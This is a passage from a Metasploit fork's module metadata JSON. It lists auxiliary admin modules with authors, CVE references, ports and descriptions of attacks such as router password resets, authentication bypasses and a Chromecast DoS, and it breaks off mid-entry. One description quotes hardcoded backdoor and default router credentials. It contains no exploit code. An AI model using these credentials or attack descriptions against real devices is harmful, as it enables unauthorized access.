dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/db/modules_metadata_base.json

151009 lines
4.9 MiB
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"auxiliary_admin/2wire/xslt_password_reset": {
"name": "2Wire Cross-Site Request Forgery Password Reset Vulnerability",
"full_name": "auxiliary/admin/2wire/xslt_password_reset",
"rank": 300,
"disclosure_date": "2007-08-15",
"type": "auxiliary",
"author": [
"hkm <hkm@hakim.ws>",
"Travis Phillips"
],
"description": "This module will reset the admin password on a 2Wire wireless router. This is\n done by using the /xslt page where authentication is not required, thus allowing\n configuration changes (such as resetting the password) as administrators.",
"references": [
"CVE-2007-4387",
"OSVDB-37667",
"BID-36075",
"URL-https://seclists.org/bugtraq/2007/Aug/225"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/2wire/xslt_password_reset.rb",
"is_install_path": true,
"ref_name": "admin/2wire/xslt_password_reset",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/android/google_play_store_uxss_xframe_rce": {
"name": "Android Browser RCE Through Google Play Store XFO",
"full_name": "auxiliary/admin/android/google_play_store_uxss_xframe_rce",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Rafay Baloch",
"joev <joev@metasploit.com>"
],
"description": "This module combines two vulnerabilities to achieve remote code\n execution on affected Android devices. First, the module exploits\n CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in\n versions of Android's open source stock browser (the AOSP Browser) prior to\n 4.4. Second, the Google Play store's web interface fails to enforce a\n X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be\n targeted for script injection. As a result, this leads to remote code execution\n through Google Play's remote installation feature, as any application available\n on the Google Play store can be installed and launched on the user's device.\n\n This module requires that the user is logged into Google with a vulnerable browser.\n\n To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`.",
"references": [
"URL-https://community.rapid7.com/community/metasploit/blog/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041",
"URL-http://1337day.com/exploit/description/22581",
"OSVDB-110664",
"CVE-2014-6041"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb",
"is_install_path": true,
"ref_name": "admin/android/google_play_store_uxss_xframe_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/appletv/appletv_display_image": {
"name": "Apple TV Image Remote Control",
"full_name": "auxiliary/admin/appletv/appletv_display_image",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"0a29406d9794e4f9b30b3c5d6702c708",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will show an image on an AppleTV device for a period of time.\n Some AppleTV devices are actually password-protected, in that case please\n set the PASSWORD datastore option. For password brute forcing, please see\n the module auxiliary/scanner/http/appletv_login.",
"references": [
"URL-http://nto.github.io/AirPlay.html"
],
"platform": "",
"arch": "",
"rport": 7000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/appletv/appletv_display_image.rb",
"is_install_path": true,
"ref_name": "admin/appletv/appletv_display_image",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/appletv/appletv_display_video": {
"name": "Apple TV Video Remote Control",
"full_name": "auxiliary/admin/appletv/appletv_display_video",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"0a29406d9794e4f9b30b3c5d6702c708",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module plays a video on an AppleTV device. Note that\n AppleTV can be somewhat picky about the server that hosts the video.\n Tested servers include default IIS, default Apache, and Ruby's WEBrick.\n For WEBrick, the default MIME list may need to be updated, depending on\n what media file is to be played. Python SimpleHTTPServer is not\n recommended. Also, if you're playing a video, the URL must be an IP\n address. Some AppleTV devices are actually password-protected; in that\n case please set the PASSWORD datastore option. For password\n brute forcing, please see the module auxiliary/scanner/http/appletv_login.",
"references": [
"URL-http://nto.github.io/AirPlay.html"
],
"platform": "",
"arch": "",
"rport": 7000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/appletv/appletv_display_video.rb",
"is_install_path": true,
"ref_name": "admin/appletv/appletv_display_video",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/atg/atg_client": {
"name": "Veeder-Root Automatic Tank Gauge (ATG) Administrative Client",
"full_name": "auxiliary/admin/atg/atg_client",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module acts as a simplistic administrative client for interfacing\n with Veeder-Root Automatic Tank Gauges (ATGs) or other devices speaking\n the TLS-250 and TLS-350 protocols. This has been tested against\n GasPot and Conpot, both honeypots meant to simulate ATGs; it has not\n been tested against anything else, so use at your own risk.",
"references": [
"URL-https://community.rapid7.com/community/infosec/blog/2015/01/22/the-internet-of-gas-station-tank-gauges",
"URL-http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-gaspot-experiment",
"URL-https://github.com/sjhilt/GasPot",
"URL-https://github.com/mushorg/conpot",
"URL-http://www.veeder.com/us/automatic-tank-gauge-atg-consoles",
"URL-http://www.chipkin.com/files/liz/576013-635.pdf",
"URL-http://www.veeder.com/gold/download.cfm?doc_id=6227"
],
"platform": "",
"arch": "",
"rport": 10001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/atg/atg_client.rb",
"is_install_path": true,
"ref_name": "admin/atg/atg_client",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/aws/aws_launch_instances": {
"name": "Launches Hosts in AWS",
"full_name": "auxiliary/admin/aws/aws_launch_instances",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Javier Godinez <godinezj@gmail.com>"
],
"description": "This module will attempt to launch an AWS instances (hosts) in EC2.",
"references": [
"URL-https://drive.google.com/open?id=0B2Ka7F_6TetSNFdfbkI1cnJHUTQ",
"URL-https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/4721/IDY-W10-DevSecOps-on-the-Offense-Automating-Amazon-Web-Services-Account-Takeover.pdf"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/aws/aws_launch_instances.rb",
"is_install_path": true,
"ref_name": "admin/aws/aws_launch_instances",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/backupexec/dump": {
"name": "Veritas Backup Exec Windows Remote File Access",
"full_name": "auxiliary/admin/backupexec/dump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"Unknown"
],
"description": "This module abuses a logic flaw in the Backup Exec Windows Agent to download\n arbitrary files from the system. This flaw was found by someone who wishes to\n remain anonymous and affects all known versions of the Backup Exec Windows Agent. The\n output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program\n listed in the references section. To transfer an entire directory, specify a\n path that includes a trailing backslash.",
"references": [
"CVE-2005-2611",
"OSVDB-18695",
"BID-14551",
"URL-http://www.fpns.net/willy/msbksrc.lzh"
],
"platform": "",
"arch": "",
"rport": 10000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/backupexec/dump.rb",
"is_install_path": true,
"ref_name": "admin/backupexec/dump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/backupexec/registry": {
"name": "Veritas Backup Exec Server Registry Access",
"full_name": "auxiliary/admin/backupexec/registry",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This modules exploits a remote registry access flaw in the BackupExec Windows\n Server RPC service. This vulnerability was discovered by Pedram Amini and is based\n on the NDR stub information posted to openrce.org.\n Please see the action list for the different attack modes.",
"references": [
"OSVDB-17627",
"CVE-2005-0771",
"URL-http://www.idefense.com/application/poi/display?id=269&type=vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 6106,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/backupexec/registry.rb",
"is_install_path": true,
"ref_name": "admin/backupexec/registry",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/chromecast/chromecast_reset": {
"name": "Chromecast Factory Reset DoS",
"full_name": "auxiliary/admin/chromecast/chromecast_reset",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>"
],
"description": "This module performs a factory reset on a Chromecast, causing a denial of service (DoS).\n No user authentication is required.",
"references": [
"URL-http://www.google.com/intl/en/chrome/devices/chromecast/index.html"
],
"platform": "",
"arch": "",
"rport": 8008,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/chromecast/chromecast_reset.rb",
"is_install_path": true,
"ref_name": "admin/chromecast/chromecast_reset",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/chromecast/chromecast_youtube": {
"name": "Chromecast YouTube Remote Control",
"full_name": "auxiliary/admin/chromecast/chromecast_youtube",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>"
],
"description": "This module acts as a simple remote control for Chromecast YouTube.",
"references": [
"URL-http://www.google.com/intl/en/chrome/devices/chromecast/index.html"
],
"platform": "",
"arch": "",
"rport": 8008,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/chromecast/chromecast_youtube.rb",
"is_install_path": true,
"ref_name": "admin/chromecast/chromecast_youtube",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/cisco/cisco_asa_extrabacon": {
"name": "Cisco ASA Authentication Bypass (EXTRABACON)",
"full_name": "auxiliary/admin/cisco/cisco_asa_extrabacon",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Sean Dillon <sean.dillon@risksense.com>",
"Zachary Harding <zachary.harding@risksense.com>",
"Nate Caroe <nate.caroe@risksense.com>",
"Dylan Davis <dylan.davis@risksense.com>",
"William Webb <william_webb@rapid7.com>",
"Jeff Jarmoc <jjarmoc>",
"Equation Group",
"Shadow Brokers"
],
"description": "This module patches the authentication functions of a Cisco ASA\n to allow uncredentialed logins. Uses improved shellcode for payload.",
"references": [
"CVE-2016-6366",
"URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp",
"URL-https://github.com/RiskSense-Ops/CVE-2016-6366"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb",
"is_install_path": true,
"ref_name": "admin/cisco/cisco_asa_extrabacon",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/cisco/cisco_secure_acs_bypass": {
"name": "Cisco Secure ACS Unauthorized Password Change",
"full_name": "auxiliary/admin/cisco/cisco_secure_acs_bypass",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jason Kratzer <pyoor@flinkd.org>"
],
"description": "This module exploits an authentication bypass issue which allows arbitrary\n password change requests to be issued for any user in the local store.\n Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well\n as version 5.2 with either no patches or patches 1 and 2 are vulnerable.",
"references": [
"BID-47093",
"CVE-2011-0951",
"URL-http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb",
"is_install_path": true,
"ref_name": "admin/cisco/cisco_secure_acs_bypass",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/cisco/vpn_3000_ftp_bypass": {
"name": "Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access",
"full_name": "auxiliary/admin/cisco/vpn_3000_ftp_bypass",
"rank": 300,
"disclosure_date": "2006-08-23",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module tests for a logic vulnerability in the Cisco VPN Concentrator\n 3000 series. It is possible to execute some FTP statements without authentication\n (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs\n when working with CWD commands. This module simply creates an arbitrary directory,\n verifies that the directory has been created, then deletes it and verifies deletion\n to confirm the bug.",
"references": [
"BID-19680",
"CVE-2006-4313",
"OSVDB-28139",
"OSVDB-28138"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb",
"is_install_path": true,
"ref_name": "admin/cisco/vpn_3000_ftp_bypass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/db2/db2rcmd": {
"name": "IBM DB2 db2rcmd.exe Command Execution Vulnerability",
"full_name": "auxiliary/admin/db2/db2rcmd",
"rank": 300,
"disclosure_date": "2004-03-04",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Remote Command Server\n component in IBM's DB2 Universal Database 8.1. An authenticated\n attacker can send arbitrary commands to the DB2REMOTECMD named pipe\n which could lead to administrator privileges.",
"references": [
"CVE-2004-0795",
"OSVDB-4180",
"BID-9821"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/db2/db2rcmd.rb",
"is_install_path": true,
"ref_name": "admin/db2/db2rcmd",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/dns/dyn_dns_update": {
"name": "DNS Server Dynamic Update Record Injection",
"full_name": "auxiliary/admin/dns/dyn_dns_update",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"King Sabri <king.sabri@gmail.com>",
"Brent Cook <brent_cook@rapid7.com>"
],
"description": "This module allows adding and/or deleting a record to\n any remote DNS server that allows unrestricted dynamic updates.",
"references": [
"URL-http://www.tenable.com/plugins/index.php?view=single&id=35372",
"URL-https://github.com/KINGSABRI/CVE-in-Ruby/tree/master/NONE-CVE/DNSInject",
"URL-https://www.christophertruncer.com/dns-modification-dnsinject-nessus-plugin-35372/",
"URL-https://github.com/ChrisTruncer/PenTestScripts/blob/master/DNSInject.py"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/dns/dyn_dns_update.rb",
"is_install_path": true,
"ref_name": "admin/dns/dyn_dns_update",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/edirectory/edirectory_dhost_cookie": {
"name": "Novell eDirectory DHOST Predictable Session Cookie",
"full_name": "auxiliary/admin/edirectory/edirectory_dhost_cookie",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module is able to predict the next session cookie value issued\n by the DHOST web service of Novell eDirectory 8.8.5. An attacker can run\n this module, wait until the real administrator logs in, then specify the\n predicted cookie value to hijack their session.",
"references": [
"CVE-2009-4655",
"OSVDB-60035"
],
"platform": "",
"arch": "",
"rport": 8030,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-07-08 19:00:11 +0000",
"path": "/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb",
"is_install_path": true,
"ref_name": "admin/edirectory/edirectory_dhost_cookie",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/edirectory/edirectory_edirutil": {
"name": "Novell eDirectory eMBox Unauthenticated File Access",
"full_name": "auxiliary/admin/edirectory/edirectory_edirutil",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nicob",
"MC <mc@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will access Novell eDirectory's eMBox service and can run the\n following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,\n STOP_SERVICE, START_SERVICE, SET_LOGFILE.",
"references": [
"CVE-2008-0926",
"BID-28441",
"OSVDB-43690"
],
"platform": "",
"arch": "",
"rport": 8028,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb",
"is_install_path": true,
"ref_name": "admin/edirectory/edirectory_edirutil",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/emc/alphastor_devicemanager_exec": {
"name": "EMC AlphaStor Device Manager Arbitrary Command Execution",
"full_name": "auxiliary/admin/emc/alphastor_devicemanager_exec",
"rank": 300,
"disclosure_date": "2008-05-27",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "EMC AlphaStor Device Manager is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.",
"references": [
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703",
"OSVDB-45715",
"CVE-2008-2157",
"BID-29398"
],
"platform": "",
"arch": "",
"rport": 3000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb",
"is_install_path": true,
"ref_name": "admin/emc/alphastor_devicemanager_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/emc/alphastor_librarymanager_exec": {
"name": "EMC AlphaStor Library Manager Arbitrary Command Execution",
"full_name": "auxiliary/admin/emc/alphastor_librarymanager_exec",
"rank": 300,
"disclosure_date": "2008-05-27",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "EMC AlphaStor Library Manager is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.",
"references": [
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703",
"CVE-2008-2157",
"OSVDB-45715",
"BID-29398"
],
"platform": "",
"arch": "",
"rport": 3500,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb",
"is_install_path": true,
"ref_name": "admin/emc/alphastor_librarymanager_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/firetv/firetv_youtube": {
"name": "Amazon Fire TV YouTube Remote Control",
"full_name": "auxiliary/admin/firetv/firetv_youtube",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>"
],
"description": "This module acts as a simple remote control for the Amazon Fire TV's\n YouTube app.\n\n Tested on the Amazon Fire TV Stick.",
"references": [
"URL-http://www.amazon.com/dp/B00CX5P8FC?_encoding=UTF8&showFS=1",
"URL-http://www.amazon.com/dp/B00GDQ0RMG/ref=fs_ftvs"
],
"platform": "",
"arch": "",
"rport": 8008,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/firetv/firetv_youtube.rb",
"is_install_path": true,
"ref_name": "admin/firetv/firetv_youtube",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/hp/hp_data_protector_cmd": {
"name": "HP Data Protector 6.1 EXEC_CMD Command Execution",
"full_name": "auxiliary/admin/hp/hp_data_protector_cmd",
"rank": 300,
"disclosure_date": "2011-02-07",
"type": "auxiliary",
"author": [
"ch0ks",
"c4an",
"wireghoul",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits HP Data Protector's omniinet process, specifically\n against a Windows setup.\n\n When an EXEC_CMD packet is sent, omniinet.exe will attempt to look\n for that user-supplied filename with kernel32!FindFirstFileW(). If the file\n is found, the process will then go ahead execute it with CreateProcess()\n under a new thread. If the filename isn't found, FindFirstFileW() will throw\n an error (0x03), and then bails early without triggering CreateProcess().\n\n Because of these behaviors, if you try to supply an argument, FindFirstFileW()\n will look at that as part of the filename, and then bail.\n\n Please note that when you specify the 'CMD' option, the base path begins\n under C:\\.",
"references": [
"CVE-2011-0923",
"OSVDB-72526",
"ZDI-11-055",
"URL-http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux"
],
"platform": "",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb",
"is_install_path": true,
"ref_name": "admin/hp/hp_data_protector_cmd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/hp/hp_ilo_create_admin_account": {
"name": "HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation",
"full_name": "auxiliary/admin/hp/hp_ilo_create_admin_account",
"rank": 300,
"disclosure_date": "2017-08-24",
"type": "auxiliary",
"author": [
"Fabien Perigaud <fabien.perigaud@synacktiv[dot]com>"
],
"description": "This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50, triggered by a buffer\n overflow in the Connection HTTP header handling by the web server.\n Exploiting this vulnerability gives full access to the REST API, allowing arbitrary\n accounts creation.",
"references": [
"CVE-2017-12542",
"BID-100467",
"URL-https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us",
"URL-https://www.synacktiv.com/posts/exploit/hp-ilo-talk-at-recon-brx-2018.html"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-03-16 16:46:50 +0000",
"path": "/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.rb",
"is_install_path": true,
"ref_name": "admin/hp/hp_ilo_create_admin_account",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/hp/hp_imc_som_create_account": {
"name": "HP Intelligent Management SOM Account Creation",
"full_name": "auxiliary/admin/hp/hp_imc_som_create_account",
"rank": 300,
"disclosure_date": "2013-10-08",
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a lack of authentication and access control in HP Intelligent\n Management, specifically in the AccountService RpcServiceServlet from the SOM component,\n in order to create a SOM account with Account Management permissions. This module has\n been tested successfully on HP Intelligent Management Center 5.2 E0401 and 5.1 E202 with\n SOM 5.2 E0401 and SOM 5.1 E0201 over Windows 2003 SP2.",
"references": [
"CVE-2013-4824",
"OSVDB-98249",
"BID-62902",
"ZDI-13-240",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943547"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-10-09 17:06:05 +0000",
"path": "/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb",
"is_install_path": true,
"ref_name": "admin/hp/hp_imc_som_create_account",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/allegro_rompager_auth_bypass": {
"name": "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass",
"full_name": "auxiliary/admin/http/allegro_rompager_auth_bypass",
"rank": 300,
"disclosure_date": "2014-12-17",
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>",
"Jan Trencansky <jan.trencansky@gmail.com>",
"Lior Oppenheim"
],
"description": "This module exploits HTTP servers that appear to be vulnerable to the\n 'Misfortune Cookie' vulnerability which affects Allegro Software\n Rompager versions before 4.34 and can allow attackers to authenticate\n to the HTTP service as an administrator without providing valid\n credentials.",
"references": [
"CVE-2014-9222",
"URL-http://mis.fortunecook.ie",
"URL-http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf",
"URL-http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb",
"is_install_path": true,
"ref_name": "admin/http/allegro_rompager_auth_bypass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/arris_motorola_surfboard_backdoor_xss": {
"name": "Arris / Motorola Surfboard SBG6580 Web Interface Takeover",
"full_name": "auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss",
"rank": 300,
"disclosure_date": "2015-04-08",
"type": "auxiliary",
"author": [
"joev <joev@metasploit.com>"
],
"description": "The web interface for the Arris / Motorola Surfboard SBG6580 has\n several vulnerabilities that, when combined, allow an arbitrary website to take\n control of the modem, even if the user is not currently logged in. The attacker\n must successfully know, or guess, the target's internal gateway IP address.\n This is usually a default value of 192.168.0.1.\n\n First, a hardcoded backdoor account was discovered in the source code\n of one device with the credentials \"technician/yZgO8Bvj\". Due to lack of CSRF\n in the device's login form, these credentials - along with the default\n \"admin/motorola\" - can be sent to the device by an arbitrary website, thus\n inadvertently logging the user into the router.\n\n Once successfully logged in, a persistent XSS vulnerability is\n exploited in the firewall configuration page. This allows injection of\n Javascript that can perform any available action in the router interface.\n\n The following firmware versions have been tested as vulnerable:\n\n SBG6580-6.5.2.0-GA-06-077-NOSH, and\n SBG6580-8.6.1.0-GA-04-098-NOSH",
"references": [
"CVE-2015-0964",
"CVE-2015-0965",
"CVE-2015-0966",
"URL-https://community.rapid7.com/community/infosec/blog/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb",
"is_install_path": true,
"ref_name": "admin/http/arris_motorola_surfboard_backdoor_xss",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/axigen_file_access": {
"name": "Axigen Arbitrary File Read and Delete",
"full_name": "auxiliary/admin/http/axigen_file_access",
"rank": 300,
"disclosure_date": "2012-10-31",
"type": "auxiliary",
"author": [
"Zhao Liang",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in the WebAdmin\n interface of Axigen, which allows an authenticated user to read and delete\n arbitrary files with SYSTEM privileges. The vulnerability is known to work on\n Windows platforms. This module has been tested successfully on Axigen 8.10 over\n Windows 2003 SP2.",
"references": [
"US-CERT-VU-586556",
"CVE-2012-4940",
"OSVDB-86802"
],
"platform": "",
"arch": "",
"rport": 9000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/axigen_file_access.rb",
"is_install_path": true,
"ref_name": "admin/http/axigen_file_access",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/cfme_manageiq_evm_pass_reset": {
"name": "Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection",
